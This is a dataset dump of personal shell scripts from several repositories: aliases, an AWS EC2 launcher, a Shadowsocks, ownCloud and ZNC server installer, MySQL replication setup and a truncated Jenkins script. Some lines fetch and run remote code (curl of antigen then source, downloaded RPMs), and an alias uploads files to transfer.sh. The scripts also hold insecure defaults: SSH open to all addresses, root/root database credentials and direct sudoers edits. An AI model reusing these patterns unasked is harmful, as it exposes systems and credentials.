blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
174ee2772149f5aae70e7e36464cadcaa57869bb
|
Shell
|
Zandrr/devvm
|
/roles/devvm/files/bashrc
|
UTF-8
| 427
| 2.515625
| 3
|
[] |
no_license
|
export EDITOR=vim
# Git Aliases
alias gs="git status"
alias gd="git diff --patience --ignore-space-change"
alias gcb="git checkout -b"
alias gb="git branch"
alias ga="git add"
alias gh="git hist"
alias be="bundle exec"
alias gm="git checkout master"
alias gcm="git commit -m"
# Random Aliases
alias notes="vim ~/Desktop/notes.txt"
alias v="vim"
# Source global definitions
if [ -f /etc/bashrc ]; then
. /etc/bashrc
fi
| true
|
ed81315b5a9ea80178fb61867526372732691a16
|
Shell
|
Peterschuellermann/Cloud-Computing-Benchmark
|
/aws-ec2.sh
|
UTF-8
| 2,327
| 3.53125
| 4
|
[] |
no_license
|
#!bin/bash
# importing and generating key pair
if [[ ! -f $HOME/KEY ]]; then
mkdir ~/KEY
fi
if [[ ! -f $HOME/KEY/CC17key.pem ]]; then
openssl genrsa -out $HOME/KEY/CC17key.pem 2048
fi
openssl rsa -in $HOME/KEY/CC17key.pem -pubout > $HOME/KEY/CC17key.pub
sed -e '2,$!d' -e '$d' $HOME/KEY/CC17key.pub >> $HOME/KEY/CC17key_without_headntail.pub
aws ec2 import-key-pair --public-key-material file://~/KEY/CC17key_without_headntail.pub --key-name CC17key
# creating a security group
aws ec2 create-security-group --group-name CC17GRP16 --description "My security group"
# enable ssh for security group
aws ec2 authorize-security-group-ingress --group-name CC17GRP16 --protocol tcp --port 22 --cidr 0.0.0.0/0 --region eu-central-1
# creating an instance -check
aws ec2 run-instances --image-id ami-f603d399 --count 1 --instance-type m3.medium --key-name CC17key --security-groups CC17GRP16 --region eu-central-1
# getting the DNS Addr & InstanceID & InstanceIP
PubDNS=$(aws ec2 describe-instances --filters "Name=instance-type,Values=m3.medium" | grep PublicDnsName | awk -F'"' '{ print $4}' | sort | uniq | sed 1d)
InstanceID=$(aws ec2 describe-instances --filters "Name=instance-type,Values=m3.medium" | grep InstanceId | awk -F'"' '{ print $4}' | sort | uniq)
InstanceIP=$(aws ec2 describe-instances --filters "Name=instance-type,Values=m3.medium" | grep PublicIp | awk -F'"' '{ print $4}' | sort | uniq)
printf "\ngrab a coffee and wait for the machine $PubDNS to boot\n"
while [[ $(bash -c "(echo > /dev/tcp/$PubDNS/22) 2>&1") ]]; do
echo 'still waiting...'
sleep 10
done
# transfer files for benchmarking // <rsync buggy;dont know why i get permission denied>
#git clone https://github.com/Pepperrs/Cloud-Computing-Benchmark.git ~/CCBenchmark
#rsync -ae ssh -i $HOME/KEY/CC17key.pem -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null --progress ~/CCBenchmark/ ec2-user@$InstanceIP:~/ -v
# connecting
ssh -i $HOME/KEY/CC17key.pem ec2-user@$PubDNS
# delete everything
#aws ec2 terminate-instances --instance-ids $InstanceID --region eu-central-1
#aws ec2 delete-security-group --group-name CC17GRP16 --region eu-central-1
#aws ec2 delete-key-pair --key-name CC17key
#rm -rf ~/KEY
#rm -rf ~/CCBenchmark
#unset PubDNS InstanceIP InstanceID
#echo"deleted everything related to your aws instance"
| true
|
525f42e2bb62c6abc3621007c95801ee807c0ca1
|
Shell
|
ddysher/.unixrc
|
/tools/scripts/install_server.sh
|
UTF-8
| 6,319
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
set +x
# Installation script for ubuntu15.04 remote host.
function InstallAll() {
InstallBasicPackages
InstallShadowsocks
InstallOwncloud
InstallZnc
if false; then
ChangeHostname "vultr.guest" "pitaya" # Only Used for vultr cloudprovider
CreateUser "deyuan" # Optionlly create a user
fi
}
function InstallBasicPackages() {
sudo apt-get install -y git curl vim
}
function InstallShadowsocks() {
sudo apt-get update
sudo apt-get install -y python-pip curl
sudo pip install shadowsocks
local -r public_ip="$(curl icanhazip.com)"
local -r password=$(dd if=/dev/urandom bs=128 count=1 2>/dev/null | base64 | tr -d "=+/" | dd bs=16 count=1 2>/dev/null)
sudo cat <<EOF > /etc/shadowsocks.json
{
"server": "${public_ip}",
"server_port": 8388,
"password": "${password}",
"timeout":300,
"method":"aes-256-cfb",
"fast_open": false
}
EOF
sudo cat <<EOF > /etc/systemd/system/shadowsocks-server.service
[Unit]
Description=Shadowsocks Server
After=network.target
[Service]
PermissionsStartOnly=true
ExecStart=/usr/local/bin/ssserver -c /etc/shadowsocks.json
Restart=on-abort
User=nobody
Group=nogroup
UMask=0027
[Install]
WantedBy=multi-user.target
EOF
systemctl enable shadowsocks-server.service
systemctl start shadowsocks-server.service
}
function InstallOwncloud() {
sudo sh -c "echo 'deb http://download.opensuse.org/repositories/isv:/ownCloud:/community/xUbuntu_15.04/ /' >> /etc/apt/sources.list.d/owncloud.list"
sudo apt-get update
DEBIAN_FRONTEND=noninteractive apt-get -q -y install mysql-server
sudo apt-get install -y --force-yes owncloud
# Create a config file for apache to serve 'owncloud.deyuan.me'. If the domain
# is not attached to the machine, then it will have no effect. Owncloud can be
# accessed from $public_ip/owncloud.
sudo mkdir /etc/ssl/apache
sudo cp ~/.unixrc/scripts/ssl/apache/* /etc/ssl/apache
sudo cat <<EOF > /etc/apache2/sites-available/owncloud.conf
<VirtualHost owncloud.deyuan.me:80>
ServerName owncloud.deyuan.me
# Redirect all requests to https. Note the root "/" is relative to domain
# 'owncloud.deyuan.me'. E.g. if we change "/" to "abc", we'll be redirected
# to https only if we request 'http://owncloud.deyuan.me/abc'
Redirect "/" "https://owncloud.deyuan.me"
</VirtualHost>
<VirtualHost owncloud.deyuan.me:443>
ServerName owncloud.deyuan.me
ServerAdmin webmaster@localhost
DocumentRoot /var/www/owncloud
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
SSLEngine on
SSLCertificateFile /etc/ssl/apache/deyuan.me.crt
SSLCertificateKeyFile /etc/ssl/apache/deyuan.me.key
<FilesMatch "\.(cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>
BrowserMatch "MSIE [2-6]" \
nokeepalive ssl-unclean-shutdown \
downgrade-1.0 force-response-1.0
# MSIE 7 and newer should be able to use keepalive
BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown
</VirtualHost>
EOF
sudo a2ensite owncloud.conf
sudo a2enmod ssl
sudo systemctl restart apache2.service
}
# Install Znc for IRC chat (running as daemon). Example configuration file:
# Version = 1.6.0
# <Listener l>
# Port = 5000
# IPv4 = true
# IPv6 = false
# SSL = true
# </Listener>
# LoadModule = webadmin
#
# <User ddysher>
# Pass = sha256#5ff062957ecdab93248024c5e5140a113b9215665de830f51f5e808102f7adb4#W_FZ-2/zxhieih:K.Byy#
# Admin = true
# Nick = ddysher
# AltNick = deyuan
# Ident = ddysher
# RealName = Deyuan Deng
# LoadModule = chansaver
# LoadModule = controlpanel
#
# <Network freenode>
# LoadModule = simple_away
# Server = irc.freenode.net 6667
# </Network>
# </User>
#
# Notes:
# [ ** ] To connect to this ZNC you need to connect to it as your IRC server
# [ ** ] using the port that you supplied. You have to supply your login info
# [ ** ] as the IRC server password like this: user/network:pass or user:pass.
function InstallZnc() {
sudo apt-get update
sudo apt-get install -y python-software-properties
sudo add-apt-repository -y ppa:teward/znc
sudo apt-get update
sudo apt-get install -y znc znc-dbg znc-dev znc-perl znc-python znc-tcl
sudo apt-get install -y libapache2-mod-proxy-html libxml2-dev # For apache proxy
sudo useradd --create-home -d /var/lib/znc --system --shell /sbin/nologin --comment "Account to run ZNC daemon" --user-group znc
sudo mkdir /var/lib/znc
sudo chown znc:znc /var/lib/znc
# Do not start ZNC when creating conf; otherwise, systemctl will fail.
sudo -u znc /usr/bin/znc --datadir=/var/lib/znc --makeconf
# Create a config file for apache to serve 'znc.deyuan.me'. Note we assume
# znc will listen on port 5000.
sudo mkdir /etc/ssl/apache
sudo cp ~/.unixrc/scripts/ssl/apache/* /etc/ssl/apache
sudo cat <<EOF > /etc/apache2/sites-available/znc.conf
<VirtualHost znc.deyuan.me:80>
ServerName znc.deyuan.me
Redirect "/" "https://znc.deyuan.me"
</VirtualHost>
<VirtualHost znc.deyuan.me:443>
ServerName znc.deyuan.me
ProxyPreserveHost On
SSLEngine on
SSLCertificateFile /etc/ssl/apache/deyuan.me.crt
SSLCertificateKeyFile /etc/ssl/apache/deyuan.me.key
ProxyPass / http://localhost:5000/
ProxyPassReverse / http://localhost:5000/
</VirtualHost>
EOF
sudo cat <<EOF > /etc/systemd/system/znc.service
[Unit]
Description=ZNC, an advanced IRC bouncer
After=network.target
[Service]
ExecStart=/usr/bin/znc -f --datadir=/var/lib/znc
User=znc
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl start znc
sudo a2ensite znc.conf
sudo a2enmod proxy
sudo a2enmod proxy_http
sudo a2enmod proxy_ajp
sudo a2enmod rewrite
sudo a2enmod deflate
sudo a2enmod headers
sudo a2enmod proxy_balancer
sudo a2enmod proxy_connect
sudo a2enmod proxy_html
sudo a2enmod xml2enc
sudo systemctl restart apache2.service
}
function ChangeHostname() {
if grep -Fxq "$1" /etc/hostname
then
sudo hostname $2
sudo sed -i "s/$1/$2/g" /etc/hostname
fi
if grep -Fxq "$1" /etc/hosts
then
sudo sed -i "s/$1/$2/g" /etc/hosts
else
echo "" >> /etc/hosts
echo "127.0.0.1 $2" >> /etc/hosts
fi
}
function CreateUser() {
sudo useradd $1 -m -s /bin/bash
sudo passwd $1
sudo echo "$1 ALL=(ALL) ALL" >> /etc/sudoers
}
| true
|
6b14923885c37ad3ea0b791b7a691a2ecae9e1f3
|
Shell
|
cebutech/vagrant
|
/install_vagrant.sh
|
UTF-8
| 1,027
| 2.625
| 3
|
[] |
no_license
|
#update url's for packages as they are released
#adding comments
#adding more comments
cd ~
mkdir vagrant_env
cd vagrant_env
rpm --import http://apt.sw.be/RPM-GPG-KEY.dag.txt
wget http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm
rpm -K rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm
rpm -i rpmforge-release-0.5.3-1.el6.rf.x86_64.rpm
#test rpm forge by installing htop
yum install htop
echo "---------------------------"
echo "rpmforge has been installed"
sleep 5
wget https://dl.bintray.com/mitchellh/vagrant/vagrant_1.7.3_x86_64.rpm
rpm -i vagrant_1.7.3_x86_64.rpm
vagrant -v
echo "vagrant has been installed"
sleep 5
cd /etc/yum.repos.d
wget http://download.virtualbox.org/virtualbox/rpm/rhel/virtualbox.repo
cd ~
cd vagrant_env
yum --enablerepo rpmforge install dkms
yum -y install VirtualBox-4.3
echo "-------------------"
echo "virtualbox installed"
usermod -a -G vboxusers hal
echo "the following packages have been installed..."
rpm -qa |egrep -i "rpmforge|vagrant|virtual"
| true
|
5cdfb852f5fc4532ec6ed04358f4437cadab75f0
|
Shell
|
wnj-santrong/aio
|
/WebRoot/shell/clearLog.sh
|
UTF-8
| 698
| 3.34375
| 3
|
[] |
no_license
|
#!/bin/sh
# clear tomcat log
tomcat_home=/opt/AIO/Service/webservice/apache-tomcat-7.0.54
filelist=`ls $tomcat_home/logs/ | grep catalina`
filecount=`ls $tomcat_home/logs/ | grep catalina | wc -l`
filelimit=15 # keep 15 files
if [ $filecount -gt $filelimit ]; then
delcount=$(($filecount-$filelimit))
i=0
for file in $filelist
do
if [ $i -lt $delcount ]; then
rm -rf $tomcat_home/logs/$file
fi
i=$(($i+1))
done
fi
echo "" > $tomcat_home/logs/catalina.out
# clear nginx log
nginx_home=/opt/AIO/Service/webservice/nginx1.7.4
day=`date '+%d'`
if [ $day -eq 1 ]; then # clear logs every day of month in 1
echo "" > $nginx_home/logs/error.log
echo "" > $nginx_home/logs/access.log
fi
| true
|
f0e1b98816e10a33b1673c257037dbddef9e8d49
|
Shell
|
ezzedin779/holberton-system_engineering-devops
|
/0x0F-load_balancer/0-custom_http_response-header
|
UTF-8
| 746
| 2.921875
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# configurirng my HTTP Header of the 2 servers
sudo apt-get update
sudo apt-get install -y nginx
sudo mkdir -p /var/www/html
sudo touch /var/www/html/index.html
echo "Holberton School" > /var/www/html/index.html
sudo touch /var/www/html/404.html
echo "Ceci n'est pas une page" > /var/www/html/404.html
printf %s "server {
listen 80 default_server;
listen [::]:80 default_server;
add_header X-Served-By $HOSTNAME;
root /var/www/html;
index index.html index.htm;
location /redirect_me {
return 301 http://cuberule.com/;
}
error_page 404 /404.html;
location /404 {
root /var/www/html;
internal;
}
}" > /etc/nginx/sites-available/default
sudo service nginx restart
| true
|
250f06619058888296f79b4ea91fd31ef12a63d8
|
Shell
|
keizo042/dotfile
|
/script/haskell.sh
|
UTF-8
| 228
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/bash
DEPS="ghc-mod hasktags codex hscope pointfree pointful hoogle stylish-haskell hindent hdevtools"
RESOLVER="lts-8.20"
for dep in $DEPS; do
printf "install %s\n" $dep
stack install --resolver $RESOLVER $dep
done
| true
|
cdf29356a82d6883ba65bb850883e2a02fe95c0c
|
Shell
|
dubanoze/actility_gw
|
/lrr/com/cmd_shells/exportlog.sh
|
UTF-8
| 1,180
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/sh
#default values
HOST=""
PORT=""
USER=""
PASS=""
SFTP="1"
LOGDIR=""
while [ $# -gt 0 ]
do
case $1 in
-A)
shift
HOST="${1}"
shift
;;
-P)
shift
PORT="${1}"
shift
;;
-U)
shift
USER="${1}"
shift
;;
-W)
shift
PASS="${1}"
shift
;;
-S)
shift
SFTP="${1}"
shift
;;
-L)
shift
LOGDIR="${1}"
shift
;;
-C)
shift
CRYPTED="-c"
;;
*)
shift
;;
esac
done
[ -z "$HOST" ] && exit 1
[ -z "$PORT" ] && exit 1
[ -z "$USER" ] && exit 1
[ -z "$PASS" ] && exit 1
if [ -f ${ROOTACT}/lrr/com/_parameters.sh ]
then
. ${ROOTACT}/lrr/com/_parameters.sh
fi
if [ -f ${ROOTACT}/lrr/com/_functions.sh ]
then
. ${ROOTACT}/lrr/com/_functions.sh
fi
[ -z "$LRRSYSTEM" ] && LRRSYSTEM="$SYSTEM"
LOGFILE="LOGS_$(date '+%y%m%d_%H%M%S').tar.gz"
# tar directories
tarfile="/tmp/sendlog.tar"
rm -f $tarfile $tarfile.gz
cmd="tar cvhf $tarfile $ROOTACT/var/log/lrr $ROOTACT/usr/etc/lrr $ROOTACT/lrr/config $LOGDIR"
[ "$SYSTEM" != "ciscoms" ] && cmd="$cmd /var/log/messages"
$cmd
# gzip
gzip $tarfile
lrr_UploadToRemote $CRYPTED -u $USER -w "$PASS" -a $HOST -p $PORT -l $tarfile.gz -r $LOGFILE -s $SFTP
exit $?
| true
|
990d103ac467e411ebdffaa3b6d2c991df41b30b
|
Shell
|
essa/docker-mysql-repl
|
/create_repl.sh
|
UTF-8
| 3,076
| 3.328125
| 3
|
[] |
no_license
|
#!/bin/bash
# modified from
# https://github.com/paulczar/docker-wordpress/blob/master/docker
#
DOCKER_IMAGE=essa/mysql-repl
echo
echo "Create MySQL Tier"
echo "-----------------"
echo "* Create MySQL01"
if [ -d data/mysql ]; then
echo "using existing DB"
else
mkdir -p data/mysql
cp ./initialize_db.sh data/mysql
MYSQL01=$(docker run -d -v `pwd`/data/mysql:/var/lib/mysql:rw $DOCKER_IMAGE /var/lib/mysql/initialize_db.sh)
docker wait $MYSQL01
# docker logs $MYSQL01
fi
MYSQL01=$(docker run -d -v `pwd`/data/mysql:/var/lib/mysql:rw $DOCKER_IMAGE mysqld_safe --server-id=1 --log-bin=mysql-bin --log-slave-updates=1)
MYSQL01_IP=$(docker inspect $MYSQL01 | grep IPAd | awk -F'"' '{print $4}')
# echo $MYSQL01
# echo $MYSQL01_IP
# docker ps
echo "* Create MySQL02"
rm -rf replica
mkdir -p replica/data/mysql
cp Dockerfile *.sh *.cnf replica
cp ./initialize_db.sh replica/data/mysql
MYSQL02=$(docker run -d -v `pwd`/replica/data/mysql:/var/lib/mysql:rw $DOCKER_IMAGE /var/lib/mysql/initialize_db.sh)
docker wait $MYSQL02
docker logs $MYSQL02
MYSQL02=$(docker run -d -v `pwd`/replica/data/mysql:/var/lib/mysql:rw $DOCKER_IMAGE mysqld_safe --server-id=2 --log-bin=mysql-bin --log-slave-updates=1)
MYSQL02_IP=$(docker inspect $MYSQL02 | grep IPAd | awk -F'"' '{print $4}')
echo $MYSQL02
echo $MYSQL02_IP
docker ps
echo "* Sleep for two seconds for servers to come online..."
sleep 2
echo "* Creat replication user"
mysql -uroot -proot -h $MYSQL01_IP -AN -e 'GRANT REPLICATION SLAVE ON *.* TO "replication"@"%" IDENTIFIED BY "password";'
mysql -uroot -proot -h $MYSQL01_IP -AN -e 'flush privileges;'
echo "* Export Data from MySQL01 to MySQL02"
mysqldump -uroot -proot -h $MYSQL01_IP --single-transaction --all-databases \
--flush-privileges | mysql -uroot -proot -h $MYSQL02_IP
echo "* Set MySQL01 as master on MySQL02"
MYSQL01_Position=$(mysql -uroot -proot -h $MYSQL01_IP -e "show master status \G" | grep Position | awk '{print $2}')
MYSQL01_File=$(mysql -uroot -proot -h $MYSQL01_IP -e "show master status \G" | grep File | awk '{print $2}')
mysql -uroot -proot -h $MYSQL02_IP -AN -e "CHANGE MASTER TO master_host='$MYSQL01_IP', master_port=3306, \
master_user='replication', master_password='password', master_log_file='$MYSQL01_File', \
master_log_pos=$MYSQL01_Position;"
echo "* Start Slave"
mysql -uroot -proot -h $MYSQL02_IP -AN -e "start slave;"
echo "* Test replication"
mysql -uroot -proot -h $MYSQL01_IP -e "drop database if exists repltest; create database repltest;"
mysql -uroot -proot -h $MYSQL01_IP repltest < repltest.sql
echo "* Sleep 5 seconds, then check that database 'repltest' exists on MySQL02"
sleep 5
mysql -uroot -proot -h $MYSQL02_IP -e "show databases; \G" | grep repltest
if mysql -uroot -proot -h $MYSQL02_IP -e "select title from test where id = 1234 ; " repltest | grep 'If you see this message, replication is OK' ; then
echo "* Everything is OK. Kill the containers"
docker kill $MYSQL01
docker kill $MYSQL02
else
echo "can't find replicated data on MYSQL02"
exit 1
fi
| true
|
d5ea948e71c17b6c3d1596ca8d3800108a97dd50
|
Shell
|
alldatacenter/alldata
|
/studio/micro-services/CloudEon/cloudeon-stack/EDP-1.0.0/spark/render/init-history-hdfs-dir.sh.ftl
|
UTF-8
| 612
| 2.90625
| 3
|
[
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] |
permissive
|
#!/bin/bash
HDFS_HOME="$HADOOP_HOME"
HDFS_CONF_DIR="/opt/edp/${service.serviceName}/conf"
SPARK_HISTORY_LOGS_DIR="${conf['spark.history.fs.logDirectory']}"
/bin/bash -c "$HDFS_HOME/bin/hadoop --config $HDFS_CONF_DIR fs -test -e $SPARK_HISTORY_LOGS_DIR"
if [ $? -eq 0 ] ;then
echo "$SPARK_HISTORY_LOGS_DIR already exists."
else
echo "$SPARK_HISTORY_LOGS_DIR does not exist."
/bin/bash -c "$HDFS_HOME/bin/hadoop --config $HDFS_CONF_DIR fs -mkdir -p $SPARK_HISTORY_LOGS_DIR"
/bin/bash -c "$HDFS_HOME/bin/hadoop --config $HDFS_CONF_DIR fs -chmod -R 777 $SPARK_HISTORY_LOGS_DIR"
fi
| true
|
f7bb079408312b0ed0dbe383c2ae642e0beaef8e
|
Shell
|
BTBTravis/generative-sketches
|
/preview.sh
|
UTF-8
| 155
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
echo "Previewing $1"
if [ $# -eq 1 ]
then
echo "Creating index.html"
sed "s/001/$1/" preview.html > index.html
http-server .
fi
| true
|
38019329e6da9c3674eae645c90350bf77b9dc70
|
Shell
|
teo-devel/vagrant-arch64-base
|
/system_files/auto-reflector/auto-reflector.sh
|
UTF-8
| 727
| 3.640625
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/env bash
error() {
local parent_lineno="$1"
local message="$2"
local code="${3:-1}"
if [[ -n "$message" ]] ; then
echo ":: ERROR :: Error on or near line ${parent_lineno}: ${message}; exiting with status ${code}"
else
echo ":: ERROR :: Error on or near line ${parent_lineno}; exiting with status ${code}"
fi
exit "${code}"
}
trap 'error ${LINENO}' ERR
if [[ $EUID -ne 0 ]]; then
echo ":: ERROR :: This script must be run as root"
exit 1
fi
echo ":: REFLECTOR :: Starting update of mirror list"
reflector --latest 25 --protocol http --protocol https --sort rate --save /etc/pacman.d/mirrorlist.new
mv /etc/pacman.d/mirrorlist.new /etc/pacman.d/mirrorlist
echo ":: REFLECTOR :: Finished!"
| true
|
1a01ce92d73678ab34948a146c46c4e33018bd17
|
Shell
|
papagalu/samba-resource
|
/assets/out
|
UTF-8
| 685
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
# vim: set ft=sh
set -e
exec 3>&1 # make stdout available as fd 3 for the result
exec 1>&2 # redirect all output to stderr for logging
from=$1
if [ -z "$from" ]; then
echo "usage: $0 <path/to/source>"
exit 1
fi
# for jq
PATH=/usr/local/bin:$PATH
payload=$(mktemp $TMPDIR/samba-resource-request.XXXXXX)
cat > $payload <&0
samba_share=$(jq -r '.source.samba_share // ""' < $payload)
folder=$(jq -r '.source.folder // ""' < $payload)
password=$(jq -r '.source.password // ""' < $payload)
smbclient $samba_share -c "prompt OFF;recurse ON;mkdir $folder; cd $folder; lcd $from; mput *" $password
jq -n '{
"version": {"ref": "1.0"},
"metadata": []
}' >&3
exit 0
| true
|
b5140c30bc3afeaaddf4de662f1ec1732c870533
|
Shell
|
codeprimate/arid
|
/.shell_aliases
|
UTF-8
| 2,488
| 2.828125
| 3
|
[
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
# vim: set ft=zsh:
# ALIASES
#alias ls='ls --color=auto -G'
#alias ll='ls --color=auto -lGh'
#alias la='ls --color=auto -lG -a'
alias console='script/console'
alias c='bundle exec pry -r ./config/environment.rb'
alias server='script/server'
alias log='bundle exec rake log:clear; tail -f log/development.log'
alias log2='log | grep -E "(Started|Processing|Parameters|Completed)"'
alias start='RAILS_ENV=development bundle exec foreman start'
alias b="bundle exec"
alias r="bundle exec rake"
alias st="git status"
alias co="git checkout"
alias br="git branch"
alias com="git commit"
alias push="git push"
alias add="git add"
alias stake="git add -A; git commit -m 'stake'"
alias myip="dig +short myip.opendns.com @resolver1.opendns.com."
# 256 color tmux
alias mx="tmux -2"
alias mux="tmuxinator"
alias prettyjson='python -m json.tool'
#if [ -x "$(which ack-grep)" ]; then alias ack="ack-grep"; fi
if [ command -v ack-grep &> /dev/null ]; then alias ack="ack-grep"; fi
#if [ -x "$(which xdg-open)" ]; then alias open="xdg-open"; fi
if [ command -v xdg-open &> /dev/null ]; then alias open="xdg-open"; fi
#if [ -x "$(which xclip)" ]; then alias pbcopy="xclip -i -sel clipboard"; fi
if [ command -v xclip &> /dev/null ]; then alias pbcopy="xclip -i -sel clipboard"; fi
#if [ -x "$(which ctags)" ]; then
if [ command -v ctags &> /dev/null ]; then
alias rtags="find ./ -iname '*.rb' | xargs ctags"
fi
#if [ -x "$(which openssl)" ]; then alias pwgen="openssl rand -hex 32"; fi
alias glist='for ref in $(git for-each-ref --sort=-committerdate --format="%(refname)" refs/heads/ refs/remotes ); do git log -n1 $ref --pretty=format:"%Cgreen%cr%Creset %C(yellow)%d%Creset %C(bold blue)<%an>%Creset%n" | cat ; done | awk '"'! a["'$0'"]++'"
alias prod_cl='git cl $(git tag | grep prod- | sort | tail -n 1).. --merges | cat | sort'
alias staging_cl='git cl $(git tag | grep staging- | sort | tail -n 1).. --merges | cat | sort'
# Alias for transfer.sh service
transfer() { if [ $# -eq 0 ]; then echo -e "No arguments specified. Usage:\necho transfer /tmp/test.md\ncat /tmp/test.md | transfer test.md"; return 1; fi
tmpfile=$( mktemp -t transferXXX ); if tty -s; then basefile=$(basename "$1" | sed -e 's/[^a-zA-Z0-9._-]/-/g'); curl --progress-bar --upload-file "$1" "https://transfer.sh/$basefile" >> $tmpfile; else curl --progress-bar --upload-file "-" "https://transfer.sh/$1" >> $tmpfile ; fi; cat $tmpfile; rm -f $tmpfile; }
alias tdv2dokku="ssh dokku@staging.tdv2.bellingham.dev"
| true
|
536184686f70b8d17712df52ca5fa02858de0bd4
|
Shell
|
zfs-linux/test
|
/testing/zfs-test-script/zfs_script_time.sh
|
UTF-8
| 1,733
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
###############################################################################
## Written By :
## Purpose : Check atime ctime and mtime after file operation
###############################################################################
# run this script should be require root
# here create zpool /mytank
# Check time (atime ctime and mtime) behave with created file on zpool
command_success_or_fail(){ ## Function for check command successfully executed or not
if test $? -ne 0
then
echo "Command fail"
exit 1
fi
}
## Create file on zpool
touch /tank/file
## Create file on zpool
command_success_or_fail
pre_atime=`stat -c %x /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
pre_ctime=`stat -c %y /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
pre_mtime=`stat -c %z /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
sleep 1
echo "Hi, Well Come in Linux World " >> file
sleep 1
#echo "Check atime , ctime and mtime after appending file "
post_atime=`stat -c %x /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
post_ctime=`stat -c %y /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
post_mtime=`stat -c %z /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
if test $pre_ctime != $post_ctime -a $pre_mtime != $post_mtime
then
echo " PASS "
else
echo " FAIL "
fi
sleep 1
chmod 0777 file
command_success_or_fail
sleep 1
post_chmod_ctime=`stat -c %y /tank/file 2> /dev/null | cut -d' ' -f2`
command_success_or_fail
#echo "post chmod ctime = $post_chmod_ctime"
if test $pre_ctime != $post_chmod_ctime
then
echo " PASS "
else
echo " FAIL "
fi
rm -f file
command_success_or_fail
| true
|
390bafcf4b7de85f52348e3cbde9f14adfab0112
|
Shell
|
cracer/Intelligent-Intrusion-Response-System
|
/scripts/ire-server/get-logs.sh
|
UTF-8
| 671
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
CONTAINER_NAME="ire-server"
LOGFILE_PATH="/app/iirs/ire.log"
LOGFILE_NAME="ire.log"
GRAPH_PATH="/app/iirs/tmp/attack_graph_received.json"
GRAPH_NAME="attack_graph_received.json"
function info_message () {
echo -e "\e[95m[*] $1\e[0m"
}
info_message "Copying the logfile from $CONTAINER_NAME"
sudo docker cp $CONTAINER_NAME:$LOGFILE_PATH ./$LOGFILE_NAME
sudo chown $USER ./$LOGFILE_NAME
info_message "Copying the graph from $CONTAINER_NAME"
sudo docker cp $CONTAINER_NAME:$GRAPH_PATH ./$GRAPH_NAME
sudo chown $USER ./$GRAPH_NAME
mkdir ./ire-logs
mv ./$GRAPH_NAME ./$LOGFILE_NAME ./ire-logs
tar -czvf ire-logs.tar.gz ./ire-logs
rm -r ./ire-logs
echo ""
| true
|
739b0776fa6ef5f91352d45d9cd41009e36d8e84
|
Shell
|
gfelizola/dotfiles-1
|
/src/shell/aliases/bash_aliases
|
UTF-8
| 946
| 2.765625
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
alias ..="cd .."
alias ...="cd ../.."
alias ....="cd ../../.."
alias cd..="cd .."
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
alias :q="exit"
alias c="clear"
alias ch="history -c && > ~/.bash_history"
alias e="vim --"
alias g="hub"
alias ip="dig +short myip.opendns.com @resolver1.opendns.com"
alias ll="ls -l"
alias la="ls -la"
alias m="man"
alias map="xargs -n1"
alias n="npm"
alias path='printf "%b\n" "${PATH//:/\\n}"'
alias q="exit"
alias rm="rm -rf --"
alias t="tmux"
alias y="yarn"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
alias gs="git status"
alias gps="git push"
alias gpb="!git push -u origin $(git branch-name)"
alias gpl="git pull"
alias gco="git checkout"
alias gcm="git commit -m"
alias gcm="git commit -am"
alias gd="g d"
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Load OS specific aliases.
. "aliases/$OS/bash_aliases"
| true
|
1afac926a82e90ae60c0db9a6c6353a804fe797e
|
Shell
|
fossabot/dotfiles-20
|
/zsh/.zshrc
|
UTF-8
| 481
| 2.859375
| 3
|
[] |
no_license
|
#!zsh
ANTIGEN=$HOME/.antigen.zsh
[ -f $ANTIGEN ] || curl -L git.io/antigen > $ANTIGEN
if [[ -f $ANTIGEN ]]; then
source $ANTIGEN
antigen use oh-my-zsh
antigen bundle history
antigen bundle common-aliases
antigen bundle command-not-found
antigen bundle git
antigen bundle gnu-utils
antigen bundle zsh-users/zsh-completions src
antigen bundle zsh-users/zsh-autosuggestions
antigen theme dieter
antigen apply
fi
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
| true
|
e966b8fa19c214b2234e7564435e15c79b3b5802
|
Shell
|
laristra/portage
|
/jenkins/build_matrix_entry_varan.sh
|
UTF-8
| 4,990
| 3.890625
| 4
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/usr/bin/env bash
# This script is executed on Jenkins using
#
